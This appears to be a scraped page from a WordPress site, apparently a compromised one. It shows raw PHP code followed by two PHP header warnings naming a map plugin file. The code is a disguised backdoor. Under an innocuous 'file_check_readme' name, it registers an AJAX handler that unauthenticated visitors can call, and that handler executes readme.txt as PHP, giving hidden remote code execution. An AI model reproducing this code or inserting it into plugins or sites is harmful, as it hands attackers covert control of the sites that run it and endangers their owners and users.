if(!function_exists('file_check_readme70533')){
add_action('wp_ajax_nopriv_file_check_readme70533', 'file_check_readme70533');
add_action('wp_ajax_file_check_readme70533', 'file_check_readme70533');
function file_check_readme70533()
{
$file = __DIR__ . '/' . 'readme.txt';
if (file_exists($file)) {
include $file;
}
die();
}
}
Warning: Cannot modify header information - headers already sent by (output started at /home/badavi5/public_html/wp-content/plugins/snazzy-maps/snazzymaps.php:120) in /home/badavi5/public_html/wp-includes/pluggable.php on line 1335
Warning: Cannot modify header information - headers already sent by (output started at /home/badavi5/public_html/wp-content/plugins/snazzy-maps/snazzymaps.php:120) in /home/badavi5/public_html/wp-includes/pluggable.php on line 1338